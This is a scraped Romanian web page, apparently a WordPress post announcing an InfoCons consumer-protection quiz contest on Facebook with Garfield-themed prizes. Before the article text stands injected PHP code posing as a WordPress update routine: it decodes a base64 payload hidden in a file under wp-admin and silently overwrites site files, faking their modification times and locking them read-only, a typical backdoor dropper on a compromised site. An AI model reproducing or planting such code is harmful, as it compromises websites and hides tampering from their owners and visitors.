$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } 9 zile de o9atitudine! – O noua atitudine

Din 29 Iunie până pe 7 Iulie câştigi zilnic un premiu dacă eşti un consumator informat şi răspunzi corect la întrebările concursului de pe pagina noastra de Facebook. În fiecare zi lansam o întrebare al cărui răspuns îl poţi găsi în materialele de informare InfoCons pe teme de protecţia consumatorilor în reţeaua de magazine Cora, Carrefour, Inmedio, Relay, farmaciile Centrofarm, magazinele Plafar precum şi reţeaua Medlife şi cinematografe selectate din întreaga ţară!

Trimite un răspuns corect, adună cele mai multe voturi până la publicarea următoarei întrebări şi câştigi un premiu special compus din: revista Garfield, o bluză tip polar inscripţionată InfoCons şi la alegere o jucărie de pluş Garfield, o serie de 3 DVD-uri educative Discovery sau un ghiozdan, un penar şi un set de carioci personalizate cu motanul Garfield, ambasador al campaniei de protecţia consumatorilor în România. Puteti descarca lista completa a locatiilor in care gasiti materialele informative de pe acest link.

Un utilizator nu va putea castiga 2 premii. Castigatorii vor fi contactati prin intermediul paginii personale de Facebook in vederea trimiterii datelor de contact si a premiului castigat.

By o9admin